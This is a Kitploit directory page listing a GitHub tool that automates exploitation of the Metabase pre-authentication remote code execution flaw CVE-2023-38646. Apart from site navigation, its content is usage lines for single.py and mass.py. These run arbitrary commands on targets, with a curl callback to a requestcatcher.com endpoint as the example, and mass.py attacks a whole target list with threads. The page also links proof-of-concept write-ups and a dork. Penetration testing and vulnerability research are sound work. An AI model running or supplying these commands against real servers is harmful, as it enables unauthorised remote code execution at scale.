Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-38646 — Automatic Tools For Metabase Exploit Known As CVE-2023-38646 | Kitploit
Tools/GitHubGitHub/robotmikhro/cve-2023-38646
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubrobotmikhro/cve-2023-38646

CVE-2023-38646

Automatic Tools For Metabase Exploit Known As CVE-2023-38646

View Repository
27683 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-38646

Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646. Read https://secry.me/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork)

How to Use single.py

CVE-2023-38646-Single Exploit

python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"

or

python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

How to Use mass.py

CVE-2023-38646-Mass Exploit

python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt

or

python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"

Reference POC

  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
  • https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
  • https://www.metabase.com/blog/security-advisory
  • Twitter
Download Tool